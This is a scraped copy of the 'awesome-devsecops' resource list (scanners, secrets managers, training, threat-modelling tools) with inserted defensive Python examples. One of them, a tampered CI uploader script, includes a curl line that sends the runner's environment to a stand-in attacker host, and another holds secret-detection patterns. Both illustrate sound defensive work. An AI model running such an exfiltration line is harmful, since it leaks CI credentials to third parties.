TaptuIT/awesome-devsecops

Security | updated 19 days ago | 638 stars
Curating the best DevSecOps resources and tooling.

Jul 28th

Tools

Supply Chain Security

  • Harden Runner GitHub Action (93 stars) - StepSecurity - Installs a security agent on the GitHub-hosted runner (Ubuntu VM) to prevent exfiltration of credentials, detect compromised dependencies and build tools, and detect tampering of source code during the build.

Feb 7th

Tools

Multi-Platform

  • Terrascan (3.2k stars) - Accurics - Detect compliance and security violations across Infrastructure as Code to mitigate risk before provisioning cloud native infrastructure.
Jan 4th

Tools

Secrets Management

  • Keyscope (345 stars) - Spectral - Keyscope is an open source key and secret workflow tool (validation, invalidation, etc.) built in Rust.
Oct 19th, 2021

Tools

Dependency Management

  • Deepfence ThreatMapper (1.8k stars) - Apache v2, powerful runtime vulnerability scanner for Kubernetes, virtual machines and serverless.
Oct 4th, 2021

Tools

Supply Chain Security

  • Sigstore - sigstore is a set of free-to-use, open-source tools, including fulcio (346 stars), cosign (2.3k stars) and rekor (545 stars), handling digital signing, verification and checks for provenance needed to make it safer to distribute and use open source software.

Tools

Multi-Platform

  • Spectral DeepConfig - Spectral - Find misconfiguration both in infrastructure as well as apps as early as commit time.
Sep 28th, 2021

Resources

Wikis

  • SecureFlag Knowledge Base - OWASP - A repository of information about software vulnerabilities and how to prevent them.

Resources

Secure Development Lifecycle Framework

  • Building Security In Maturity Model (BSIMM) - Synopsys - A framework for software security created by observing and analysing data from leading software security initiatives.

Resources

Secure Development Guidelines

  • Fundamental Practices for Secure Software Development - SAFECode - Guidelines for implementing key secure development practices throughout the SDLC.
Sep 10th, 2021

Resources

Toolchains

  • Cloud Security and DevSecOps Best Practices and Securing Web Application Technologies (SWAT) Checklist - SANS - A poster containing the Securing Web Application Technologies (SWAT) Checklist, SANS Cloud Security Curriculum, Cloud Security Top 10, Top 12 Kubernetes Threats, and Secure DevOps Toolchain.

Jun 14th, 2021

Tools

Secrets Scanning

  • Detect Secrets (2.4k stars) - Yelp - An aptly named module for (surprise, surprise) detecting secrets within a code base.
May 28th, 2021

Tools

Supply Chain Security

  • Preflight (131 stars) - Spectral - Helps you verify scripts and executables to mitigate supply chain attacks in your CI and other systems, such as in the recent Codecov hack.
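The pin-and-verify step that a tool like Preflight performs, written out as an added example (this is not Preflight's own code): the pipeline keeps a SHA-256 digest of each script it has reviewed and refuses to hand anything to the shell whose digest differs or that has no pin at all. The script bodies, the hypothetical `uploader.sh` name and the `example.invalid` hosts are constructed for the illustration; the tampered copy appends the kind of environment-exfiltrating line that made the Codecov uploader incident possible.

```python
import hashlib
import hmac
from typing import Dict, Tuple

# Constructed script body: the reviewed version of a hypothetical CI upload helper.
TRUSTED_UPLOADER = (
    b"#!/bin/bash\n"
    b'curl -s https://uploads.example.invalid/coverage -F "file=@coverage.xml"\n'
)

# Constructed tampered copy: the same script with one appended line that posts the
# runner's environment (CI tokens included) to a third party. This is the shape
# of modification a digest pin is meant to catch before the script executes.
TAMPERED_UPLOADER = TRUSTED_UPLOADER + (
    b'curl -s -X POST --data "$(env)" https://collector.attacker.invalid/\n'
)


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of the exact bytes that would be handed to the shell."""
    return hashlib.sha256(data).hexdigest()


# Pinned digests recorded at review time. In a real pipeline this table is committed
# next to the workflow definition, never fetched from the same place as the script.
PINNED_DIGESTS: Dict[str, str] = {
    "uploader.sh": sha256_hex(TRUSTED_UPLOADER),
}


def verify_artifact(
    name: str, data: bytes, pinned: Dict[str, str] = PINNED_DIGESTS
) -> Tuple[bool, str]:
    """Return (ok, reason). Unknown names fail closed; digests compare in constant time."""
    expected = pinned.get(name)
    if expected is None:
        return False, f"{name}: no pinned digest, refusing to run an unreviewed script"
    actual = sha256_hex(data)
    if not hmac.compare_digest(actual, expected):
        return (
            False,
            f"{name}: digest mismatch, expected {expected[:12]}... got {actual[:12]}...",
        )
    return True, f"{name}: digest matches pin {expected[:12]}..."


if __name__ == "__main__":
    cases = [
        ("uploader.sh", TRUSTED_UPLOADER),   # reviewed copy: allowed
        ("uploader.sh", TAMPERED_UPLOADER),  # modified copy: blocked
        ("installer.sh", TRUSTED_UPLOADER),  # never reviewed: blocked
    ]
    for script_name, body in cases:
        ok, reason = verify_artifact(script_name, body)
        print(("RUN   " if ok else "BLOCK ") + reason)
```

The point of the constant-time comparison is not secrecy of the digest (it is public) but habit: the same helper is typically reused to compare MACs and tokens, and `hmac.compare_digest` costs nothing here. Failing closed on an unpinned name matters as much as the mismatch case; a pipeline that only checks scripts it knows about will happily run a new one an attacker drops in.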
Tools

Secrets Management

  • Teller (957 stars) - Spectral - A secrets management tool for developers - never leave your command line for secrets.
May 27th, 2021

Tools

Dynamic Analysis

  • Netz (334 stars) - Spectral - Discover internet-wide misconfigurations, using zgrab2 and others.

Tools

Secrets Scanning

  • SpectralOps - Spectral - Automated code security, secrets, tokens and sensitive data scanning.
May 24th, 2021

Tools

Containers

  • Docker-Bench-Security (7.9k stars) - Docker - The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production.

Tools

Ansible

  • Ansible-Lint (2.9k stars) - Ansible Community - Checks playbooks for practices and behaviour that could potentially be improved. As a community backed project ansible-lint supports only the last two major versions of Ansible.
May 12th, 2021

Tools

Multi-Language Support

  • Semgrep - r2c - Semgrep is a fast, open-source, static analysis tool that finds bugs and enforces code standards at editor, commit, and CI time.
May 10th, 2021

Resources

Training

  • Application Security Education (57 stars) - Duo Security - Training materials created by the Duo application security team, including introductory and advanced training presentations and hands-on labs.

Resources

Books

  • Alice and Bob Learn Application Security - Tanya Janca - An accessible and thorough resource for anyone seeking to incorporate, from the beginning of the System Development Life Cycle, best security practices in software development.
Tools

Secrets Scanning

  • CredScan - Microsoft - A credential scanning tool that can be run as a task in Azure DevOps pipelines.
  • GitGuardian - GitGuardian - A web-based solution that scans and monitors public and private git repositories for secrets.
  • Gitleaks (10.4k stars) - Zachary Rice - Gitleaks is a SAST tool for detecting hardcoded secrets like passwords, api keys, and tokens in git repositories.
  • git-secrets (10.3k stars) - AWS Labs - Scans commits, commit messages and merges for secrets. Native support for AWS secret patterns, but can be configured to support other patterns.
  • Nightfall - Nightfall - A web-based platform that monitors for sensitive data disclosure across several SDLC tools, including GitHub repositories.
  • Repo-supervisor (574 stars) - Auth0 - Secrets scanning tool that can run as a CLI, as a Docker container or in AWS Lambda.
  • truffleHog (9k stars) - Truffle Security - Searches through git repositories for secrets, digging deep into commit history and branches.
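What the scanners in this section (and Detect Secrets above) have in common is a two-layer detection: fixed patterns for token formats with a known shape, plus a generic "secret-looking assignment" rule gated on Shannon entropy so that placeholders like `changeme` do not flood the results. The following is an added example of that logic, not code from any of the listed tools; the rule set is deliberately small, the sample lines are constructed (the AWS key is the documented AWS example key, not a live credential), and the `pragma: allowlist secret` opt-out marker is the convention detect-secrets uses for inline allowlisting.

```python
import math
import re
from dataclasses import dataclass
from typing import Dict, List, Pattern

# Rules for token formats with a public, fixed shape: AWS access key ids are
# AKIA/ASIA plus 16 upper-case alphanumerics, classic GitHub PATs are ghp_ plus 36.
SPECIFIC_RULES: Dict[str, Pattern[str]] = {
    "aws-access-key-id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github-pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private-key": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
}
# Heuristic: a quoted string assigned to a secret-looking name; group 1 is the value.
GENERIC_RULE = re.compile(
    r"""(?i)(?:secret|password|passwd|api[_-]?key|token)\s*[:=]\s*['"]([^'"]{8,})['"]"""
)
ALLOWLIST_MARKER = "pragma: allowlist secret"  # inline opt-out for known test fixtures


@dataclass
class Finding:
    line_no: int
    rule: str
    value: str


def shannon_entropy(s: str) -> float:
    """Bits per character: random tokens score high, words and placeholders low."""
    if not s:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def scan_lines(lines: List[str], entropy_threshold: float = 3.5) -> List[Finding]:
    """Run the specific rules first; fall back to the entropy-gated generic rule."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        if ALLOWLIST_MARKER in line:
            continue
        matched_specific = False
        for rule, rx in SPECIFIC_RULES.items():
            for m in rx.finditer(line):
                findings.append(Finding(line_no, rule, m.group(0)))
                matched_specific = True
        if matched_specific:
            continue  # do not report the same value again under the generic rule
        for m in GENERIC_RULE.finditer(line):
            value = m.group(1)
            if shannon_entropy(value) < entropy_threshold:
                continue  # "changeme", "password123" and similar placeholders
            findings.append(Finding(line_no, "generic-assignment", value))
    return findings


# Constructed sample lines, as they might appear in a diff or a config file.
SAMPLE_LINES = [
    'AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"',
    'password = "changeme"',
    'db_password = "kX9$vB2#mQ7!pL4z"',
    'GITHUB_TOKEN = "ghp_0123456789abcdefghijklmnopqrstuvwxyz"',
    'test_token = "ghp_0123456789abcdefghijklmnopqrstuvwxyz"  # pragma: allowlist secret',
    "-----BEGIN RSA PRIVATE KEY-----",
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LINES):
        print(f"line {f.line_no}: {f.rule}: {f.value[:8]}...")
```

On the sample the scanner reports four lines: the AWS key, the high-entropy database password, the GitHub token and the private-key header. `password = "changeme"` is matched by the generic rule but dropped at 2.75 bits/char, and the allowlisted fixture is skipped entirely. The entropy threshold is the knob that trades false positives for misses; real tools also scan full git history, which is why a secret "removed" in a later commit is still a finding.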
Apr 20th, 2021

Tools

Secrets Management

  • AWS Key Management Service (KMS) - Amazon AWS - Create and manage cryptographic keys in AWS.
  • AWS Secrets Manager - Amazon AWS - Securely store retrievable application secrets in AWS.
Apr 19th, 2021

Resources

Training

  • SafeStack - SafeStack - Security training for software development teams, designed to be accessible to individuals and small teams as well as larger organisations.
  • WeHackPurple - WeHackPurple - Online courses that teach application security theory and hands-on technical lessons.
Apr 6th, 2021

Tools

Multi-Platform

  • Checkov (4.5k stars) - Bridgecrew - Scan Terraform, AWS CloudFormation and Kubernetes templates for insecure configuration.
  • KICS (1.1k stars) - Checkmarx - Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle.
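Infrastructure-as-Code scanners such as Checkov, KICS, Terrascan and cfn_nag all reduce to the same loop: walk every resource in a template, look up the checks registered for its type, and emit a finding per failed check. The block below is an added example of that loop against a CloudFormation-style JSON template; it is not code from any of the listed tools. The four checks, the `IAC-00x` check ids and the sample template are constructed for the illustration, and the property names used (`AccessControl`, `BucketEncryption`, `SecurityGroupIngress`, `PubliclyAccessible`) are the real CloudFormation ones.

```python
import json
from typing import Any, Callable, Dict, List, Optional, Tuple

Props = Dict[str, Any]
Check = Callable[[Props], Optional[str]]
Finding = Tuple[str, str, str]  # (check id, logical resource name, message)


def s3_public_acl(props: Props) -> Optional[str]:
    acl = props.get("AccessControl", "Private")
    if acl in ("PublicRead", "PublicReadWrite", "AuthenticatedRead"):
        return f"bucket ACL {acl} grants access to principals outside the account"
    return None


def s3_unencrypted(props: Props) -> Optional[str]:
    if "BucketEncryption" not in props:
        return "bucket has no BucketEncryption block (no default encryption)"
    return None


def sg_admin_ports_open(props: Props) -> Optional[str]:
    problems = []
    for rule in props.get("SecurityGroupIngress", []):
        cidr = rule.get("CidrIp") or rule.get("CidrIpv6")
        if cidr not in ("0.0.0.0/0", "::/0"):
            continue
        # IpProtocol "-1" (all traffic) carries no ports, so default to the full range.
        low = int(rule.get("FromPort", 0))
        high = int(rule.get("ToPort", 65535))
        for port, label in ((22, "SSH"), (3389, "RDP")):
            if low <= port <= high:
                problems.append(f"{label} ({port}) reachable from {cidr}")
    return "; ".join(problems) or None


def rds_public(props: Props) -> Optional[str]:
    if props.get("PubliclyAccessible") is True:
        return "DB instance is publicly accessible"
    return None


# Hypothetical check ids; each real scanner publishes its own id scheme.
CHECKS: Dict[str, List[Tuple[str, Check]]] = {
    "AWS::S3::Bucket": [("IAC-001", s3_public_acl), ("IAC-002", s3_unencrypted)],
    "AWS::EC2::SecurityGroup": [("IAC-003", sg_admin_ports_open)],
    "AWS::RDS::DBInstance": [("IAC-004", rds_public)],
}


def scan_template(template: Dict[str, Any]) -> List[Finding]:
    """Apply every registered check to every resource of a matching type."""
    findings: List[Finding] = []
    for name, resource in template.get("Resources", {}).items():
        rtype = resource.get("Type", "")
        props = resource.get("Properties") or {}
        for check_id, check in CHECKS.get(rtype, []):
            msg = check(props)
            if msg:
                findings.append((check_id, name, msg))
    return findings


# Constructed template: two buckets, two security groups, one database.
SAMPLE_TEMPLATE: Dict[str, Any] = json.loads("""
{
  "Resources": {
    "LogsBucket": {"Type": "AWS::S3::Bucket",
                   "Properties": {"AccessControl": "PublicRead"}},
    "DataBucket": {"Type": "AWS::S3::Bucket",
                   "Properties": {"BucketEncryption": {"ServerSideEncryptionConfiguration": [
                       {"ServerSideEncryptionByDefault": {"SSEAlgorithm": "aws:kms"}}]}}},
    "BastionSg": {"Type": "AWS::EC2::SecurityGroup",
                  "Properties": {"GroupDescription": "bastion", "SecurityGroupIngress": [
                      {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "CidrIp": "0.0.0.0/0"}]}},
    "InternalSg": {"Type": "AWS::EC2::SecurityGroup",
                   "Properties": {"GroupDescription": "internal", "SecurityGroupIngress": [
                       {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "CidrIp": "10.0.0.0/8"}]}},
    "AppDb": {"Type": "AWS::RDS::DBInstance",
              "Properties": {"Engine": "postgres", "PubliclyAccessible": true}}
  }
}
""")

if __name__ == "__main__":
    for check_id, name, msg in scan_template(SAMPLE_TEMPLATE):
        print(f"{check_id} {name}: {msg}")
```

The sample yields four findings (public ACL and missing encryption on `LogsBucket`, SSH open to the world on `BastionSg`, public `AppDb`) and none on the two well-configured resources. The security-group check illustrates the detail that trips up naive rules: an `IpProtocol: "-1"` rule has no port fields at all, so the check has to treat absence as "every port" rather than "no port".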
Mar 31st, 2021

Tools

Terraform

  • Terraform Compliance - terraform-compliance - A lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
Feb 18th, 2021

Resources

Toolchains

  • Periodic Table of DevOps Tools - XebiaLabs - A collection of DevSecOps tooling categorised by tool functionality.
Feb 3rd, 2021

Tools

Multi-Language Support

  • DevSkim (718 stars) - Microsoft - A set of IDE plugins, CLIs and other tools that provide security analysis for a number of programming languages.
Feb 2nd, 2021

Tools

Multi-Language Support

  • SonarLint - SonarSource - An IDE plugin that highlights potential security issues, code quality issues and bugs.
Feb 1st, 2021

Resources

Training

  • Secure Code Warrior - Secure Code Warrior - Gamified and hands-on secure development training with support for courses, assessments and tournaments.
  • SecureFlag - OWASP - Hands-on secure coding training for Developers and Build/Release Engineers.
Jan 20th, 2021

Tools

Containers

  • Hadolint (7.3k stars) - Hadolint - Checks a Dockerfile against known rules and validates inline bash code in RUN statements.

Tools

Terraform

  • Regula (758 stars) - Fugue - Evaluate Terraform infrastructure-as-code for potential security misconfigurations and compliance violations prior to deployment.
Jan 4th, 2021

Resources

Training

  • Practical DevSecOps - Practical DevSecOps - Learn DevSecOps concepts, tools and techniques from industry experts in hands-on, state-of-the-art browser-based labs.
Oct 8th, 2020

Tools

Containers

  • Trivy (13.1k stars) - Aqua Security - Simple and comprehensive vulnerability scanner for containers.
Oct 1st, 2020

Resources

Wikis

  • DevSecOps Hub - Snyk - Introduction to key DevSecOps concepts, processes and technologies.
Sep 30th, 2020

Tools

Secrets Management

  • Gopass (4.7k stars) - Gopass - Password manager for teams relying on Git and gpg. Manages secrets in encrypted files and repositories.

Tools

Multi-Language Support

  • Hawkeye (358 stars) - Hawkeyesec - Modularised CLI tool for project security, vulnerability and general risk highlighting.

Tools

Containers

  • Anchore Engine - Anchore, Inc - Deep inspection of Docker images for CVEs and checking against custom policies. Engine behind their enterprise products that integrate against registries, orchestrators and CI/CD products.
Sep 2nd, 2020

Tools

Intentionally Vulnerable Applications

  • Cfngoat (73 stars) - Bridgecrew - CloudFormation templates for creating stacks of intentionally insecure services in AWS. Ideal for testing the CloudFormation Infrastructure as Code analysis tools above.
  • Terragoat (777 stars) - Bridgecrew - Terraform templates for creating stacks of intentionally insecure services in AWS, Azure and GCP. Ideal for testing the Terraform Infrastructure as Code analysis tools above.
Jul 8th, 2020

Tools

PHP

  • Phan (5.3k stars) - Phan - Broad static analysis for PHP applications with some support for security scanning features.
Jun 24th, 2020

Tools

Monitoring

  • Csper - Csper - A set of Content Security Policy tools that can test policies, monitor CSP reports and provide metrics and alerts.
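"Testing a policy" in the Csper sense means parsing the `Content-Security-Policy` header and checking it for the handful of mistakes that make it ineffective against script injection. The following is an added example of such an audit, not Csper's code: it parses the header (first occurrence of a duplicated directive wins, as the CSP specification requires), applies the `default-src` fallback for `script-src` and `object-src`, and flags `'unsafe-inline'` only when no nonce or hash source accompanies it, because browsers that understand nonces ignore `'unsafe-inline'` in that case. The two sample policies and the `'nonce-r4nd0m'` value are constructed.

```python
from typing import Dict, List, Optional

NONCE_OR_HASH_PREFIXES = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")
BROAD_SCRIPT_SOURCES = ("*", "http:", "https:", "data:")


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a CSP header into directive -> source list; duplicates keep the first."""
    policy: Dict[str, List[str]] = {}
    for directive in header.split(";"):
        parts = directive.strip().split()
        if not parts:
            continue
        name, sources = parts[0].lower(), parts[1:]
        policy.setdefault(name, sources)
    return policy


def effective_sources(policy: Dict[str, List[str]], directive: str) -> Optional[List[str]]:
    """Fetch directives fall back to default-src; None means nothing restricts them."""
    if directive in policy:
        return policy[directive]
    return policy.get("default-src")


def audit_csp(header: str) -> List[str]:
    """Return a list of human-readable weaknesses; an empty list means none found."""
    policy = parse_csp(header)
    issues: List[str] = []
    if "default-src" not in policy:
        issues.append("default-src missing: every directive not set explicitly is unrestricted")

    scripts = effective_sources(policy, "script-src")
    if scripts is None:
        issues.append("script-src unrestricted: neither script-src nor default-src present")
    else:
        srcs = [s.lower() for s in scripts]
        has_nonce_or_hash = any(s.startswith(NONCE_OR_HASH_PREFIXES) for s in srcs)
        if "'unsafe-inline'" in srcs and not has_nonce_or_hash:
            issues.append("script-src allows 'unsafe-inline' with no nonce or hash: injected inline script runs")
        if "'unsafe-eval'" in srcs:
            issues.append("script-src allows 'unsafe-eval'")
        broad = [s for s in srcs if s in BROAD_SCRIPT_SOURCES or s.startswith("http://")]
        if broad:
            issues.append(f"script-src allows broad sources: {' '.join(broad)}")

    objects = effective_sources(policy, "object-src")
    if objects is None or "'none'" not in [s.lower() for s in objects]:
        issues.append("object-src is not 'none': plugin content can execute script")

    if "report-uri" not in policy and "report-to" not in policy:
        issues.append("no report-uri/report-to: violations are never reported")
    return issues


# Constructed sample headers: one typical weak policy and one hardened policy.
WEAK_POLICY = "default-src *; script-src 'self' 'unsafe-inline' https:"
STRICT_POLICY = (
    "default-src 'self'; "
    "script-src 'self' 'nonce-r4nd0m' 'unsafe-inline'; "
    "object-src 'none'; base-uri 'none'; report-uri /csp-violations"
)

if __name__ == "__main__":
    for label, header in (("weak", WEAK_POLICY), ("strict", STRICT_POLICY)):
        print(f"[{label}] {header}")
        for issue in audit_csp(header) or ["no issues"]:
            print("  -", issue)
```

The weak policy produces four findings (inline script without a nonce, the `https:` scheme source, `object-src` inherited from `default-src *`, and no reporting endpoint); the strict one produces none even though it still lists `'unsafe-inline'`, which here only serves as a fallback for pre-nonce browsers. A report endpoint is what turns a policy into a monitoring signal, which is the second half of what the tool above does.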
Tools

Threat Modelling

  • SecuriCAD - foreseeti - Threat modelling and attack simulations for IT infrastructure.
  • Awesome Threat Modelling (723 stars) - Practical DevSecOps - A curated list of threat modelling resources.
  • IriusRisk - IriusRisk - Draw threat models, capture threats and countermeasures, and manage risk.
  • Raindance Project (38 stars) - DevSecOps - Use attack maps to identify attack surface and adversary strategies that may lead to compromise.
  • SD Elements - Security Compass - Identify and rank threats, generate actionable tasks and track related tickets.
  • Threat Dragon - OWASP - Threat model diagramming tool.
  • Threat Modelling Tool - Microsoft - Threat model diagramming tool.
  • Threatspec - Threatspec - Define threat modelling as code.

Related Lists

  • Awesome Dynamic Analysis (584 stars) - Matthias Endler - A collection of dynamic analysis tools and code quality checkers.
  • Awesome Static Analysis (10.1k stars) - Matthias Endler - A collection of static analysis tools and code quality checkers.
  • Awesome Threat Modelling (723 stars) - Practical DevSecOps - A curated list of threat modelling resources.
  • Vulnerable Web Apps Directory - OWASP - A collection of vulnerable web applications for learning purposes.
Resources

Articles

  • Our Approach to Employee Security Training - PagerDuty - Guidelines to running security training within an organisation.
Resources

Communities

  • MyDevSecOps - Snyk - A community that runs conferences, a blog, a podcast and a Slack workspace dedicated to DevSecOps.
Resources

Conferences

  • AppSec Day - OWASP - An Australian application security conference run by OWASP.
  • DevSecCon - Snyk - A network of DevSecOps conferences run by Snyk.
Resources

Podcasts

  • Absolute AppSec - Seth Law & Ken Johnson - Discussions about current events and specific topics related to application security.
  • Application Security Podcast - Security Journey - Interviews with industry experts about specific application security concepts.
  • BeerSecOps - Aqua Security - Breaking down the silos of Dev, Sec and Ops, discussing topics that span these subject areas.
  • DevSecOps Podcast Series - OWASP - Discussions with thought leaders and practitioners to integrate security into the development lifecycle.
  • The Secure Developer - Snyk - Discussion about security tools and best practices for software developers.
Resources

Secure Development Guidelines

  • Application Security Verification Standard - OWASP - A framework of security requirements and controls to help developers design and develop secure web applications.
  • Coding Standards - CERT - A collection of secure development standards for C, C++, Java and Android development.
  • Proactive Controls - OWASP - OWASP's list of top ten controls that should be implemented in every software development project.
  • Secure Coding Guidelines - Mozilla - A guideline containing specific secure development standards for secure web application development.
  • Secure Coding Practices Quick Reference Guide - OWASP - A checklist to verify that secure development standards have been followed.
Resources

Secure Development Lifecycle Framework

  • Secure Development Lifecycle - Microsoft - A collection of tools and practices that serve as a framework for the secure development lifecycle.
  • Secure Software Development Framework - NIST - A framework consisting of practices, tasks and implementation examples for a secure development lifecycle.
  • Software Assurance Maturity Model (390 stars) - OWASP - A framework to measure and improve the maturity of the secure development lifecycle.
Resources

Training

  • Cybrary - Cybrary - Subscription based online courses with dedicated categories for cybersecurity and DevSecOps.
  • PentesterLab - PentesterLab - Hands on labs to understand and exploit simple and advanced web vulnerabilities.
  • Security Training for Engineers - PagerDuty - A presentation created and open-sourced by PagerDuty to provide security training to software engineers.
  • Security Training for Everyone - PagerDuty - A presentation created and open-sourced by PagerDuty to provide security training to employees.
  • Web Security Academy - PortSwigger - A set of materials and labs to learn and exploit common web vulnerabilities.
Tools

Dependency Management

  • Dependabot - GitHub - Automatically scan GitHub repositories for vulnerabilities and create pull requests to merge in patched dependencies.
  • Dependency-Check - OWASP - Scans dependencies for publicly disclosed vulnerabilities using CLI or build server plugins.
  • Dependency-Track - OWASP - Monitor the volume and severity of vulnerable dependencies across multiple projects over time.
  • JFrog XRay - JFrog - Security and compliance analysis for artifacts stored in JFrog Artifactory.
  • NPM Audit - NPM - Vulnerable package auditing for node packages built into the npm CLI.
  • Renovate - WhiteSource - Automatically monitor and update software dependencies for multiple frameworks and languages using a CLI or git repository apps.
  • Requires.io - Olivier Mansion & Alexis Tabary - Automated vulnerable dependency monitoring and upgrades for Python projects.
  • Snyk Open Source - Snyk - Automated vulnerable dependency monitoring and upgrades using Snyk's dedicated vulnerability database.
Tools

Dynamic Analysis

  • Automatic API Attack Tool (331 stars) - Imperva - Perform automated security scanning against an API based on an API specification.
  • BurpSuite Enterprise Edition - PortSwigger - BurpSuite's web application vulnerability scanner used widely by penetration testers, modified with CI/CD integration and continuous monitoring over multiple web applications.
  • Gauntlt (920 stars) - Gauntlt - A Behaviour Driven Development framework to run security scans using common security tools and test output, defined using Gherkin syntax.
  • SSL Labs Scan (1.6k stars) - SSL Labs - Automated scanning for SSL / TLS configuration issues.
  • Zed Attack Proxy (ZAP) (9.7k stars) - OWASP - An open-source web application vulnerability scanner, including an API for CI/CD integration.
Tools

CloudFormation

  • Cfn Nag (1k stars) - Stelligent - Scan AWS CloudFormation templates for insecure configuration.
Tools

Containers

  • Clair (8.9k stars) - Quay - Scan App Container and Docker containers for publicly disclosed vulnerabilities.
  • Dagda (983 stars) - Elías Grande - Compares OS and software dependency versions installed in Docker containers with public vulnerability databases, and also performs virus scanning.
  • Snyk Container - Snyk - Scan Docker and Kubernetes applications for security vulnerabilities during CI/CD or via continuous monitoring.
Tools

Terraform

  • Tfsec (4.8k stars) - Liam Galvin - Scan Terraform templates for security misconfiguration and noncompliance with AWS, Azure and GCP security best practice.
Tools

Kubernetes

  • Kube-Score (1.8k stars) - Gustav Westling - Scan Kubernetes object definitions for security and performance misconfiguration.
  • Kubectl Kubesec (415 stars) - ControlPlane - Plugin for kubesec.io to perform security risk analysis for Kubernetes resources.
Tools

Intentionally Vulnerable Applications

  • Bad SSL (2.4k stars) - The Chromium Project - A container running a number of webservers with poor SSL / TLS configuration. Useful for testing tooling.
  • Damn Vulnerable Web App - Ryan Dewhurst - A web application that provides a safe environment to understand and exploit common web vulnerabilities.
  • Juice Shop (7.1k stars) - OWASP - A web application containing the OWASP Top 10 security vulnerabilities and more.
  • NodeGoat (1.6k stars) - OWASP - A Node.js web application that demonstrates and provides ways to address common security vulnerabilities.
  • Vulnerable Web Apps Directory - OWASP - A collection of vulnerable web applications for learning purposes.
Tools

Secrets Management

  • Ansible Vault - Ansible - Securely store secrets within Ansible pipelines.
  • Azure Key Vault - Microsoft Azure - Securely store secrets within Azure.
  • BlackBox (6.3k stars) - StackExchange - Encrypt credentials within your code repository.
  • Chef Vault (410 stars) - Chef - Securely store secrets within Chef.
  • CredStash (2k stars) - Fugue - Securely store secrets within AWS using KMS and DynamoDB.
  • CyberArk Application Access Manager - CyberArk - Secrets management for applications including secret rotation and auditing.
  • Docker Secrets - Docker - Store and manage access to secrets within a Docker swarm.
  • Git Secrets (10.3k stars) - Amazon AWS - Scan git repositories for secrets committed within code or commit messages.
  • Google Cloud Key Management Service (KMS) - Google Cloud Platform - Securely store secrets within GCP.
  • HashiCorp Vault - HashiCorp - Securely store secrets via UI, CLI or HTTP API.
  • Pinterest Knox (1.1k stars) - Pinterest - Securely store, rotate and audit secrets.
  • Secrets Operations (SOPS) (10.4k stars) - Mozilla - Encrypt keys stored within YAML, JSON, ENV, INI and BINARY files.
Tools

Multi-Language Support

  • Graudit (1.1k stars) - Eldar Marcussen - Grep source code for potential security flaws with custom or pre-configured regex signatures.
  • LGTM - Semmle - Scan and monitor code for security vulnerabilities using custom or built-in CodeQL queries.
  • RIPS - RIPS Technologies - Automated static analysis for PHP, Java and Node.js projects.
  • SonarQube - SonarSource - Scan code for security and quality issues with support for a wide variety of languages.
Tools

C / C++

  • FlawFinder (283 stars) - David Wheeler - Scan C / C++ code for potential security weaknesses.
Tools

C#

  • Puma Scan (409 stars) - Puma Security - A Visual Studio plugin to scan .NET projects for potential security flaws.
Tools

Configuration Files

  • Conftest (2.3k stars) - Instrumenta - Create custom tests to scan any configuration file for security flaws.
Tools

Java

  • Deep Dive - Discotek.ca - Static analysis for JVM deployment units including Ear, War, Jar and APK.
  • Find Security Bugs (1.9k stars) - OWASP - SpotBugs plugin for security audits of Java web applications. Supports Eclipse, IntelliJ, Android Studio and SonarQube.
  • SpotBugs (2.8k stars) - SpotBugs - Static code analysis for Java applications.
Tools

JavaScript

  • ESLint - JS Foundation - Linting tool for JavaScript with multiple security linting rules available.
Tools

Go

  • Golang Security Checker (6.2k stars) - securego - CLI tool to scan Go code for potential security flaws.
Tools

.NET

  • Security Code Scan (769 stars) - Security Code Scan - Static code analysis for C# and VB.NET applications.
Tools

PHP

  • PHPCS Security Audit (633 stars) - Floe - PHP static analysis with rules for PHP, Drupal 7 and PHP related CVEs.
  • Progpilot (270 stars) - Design Security - Static analysis for PHP source code.
Tools

Python

  • Bandit (4.4k stars) - Python Code Quality Authority - Find common security vulnerabilities in Python code.
Tools

Ruby

  • Brakeman (6.5k stars) - Justin Collins - Static analysis tool which checks Ruby on Rails applications for security vulnerabilities.
  • DawnScanner (671 stars) - Paolo Perego - Security scanning for Ruby scripts and web applications. Supports Ruby on Rails, Sinatra and Padrino frameworks.
Last Checked At: 2022-08-03T13:21:35.695Z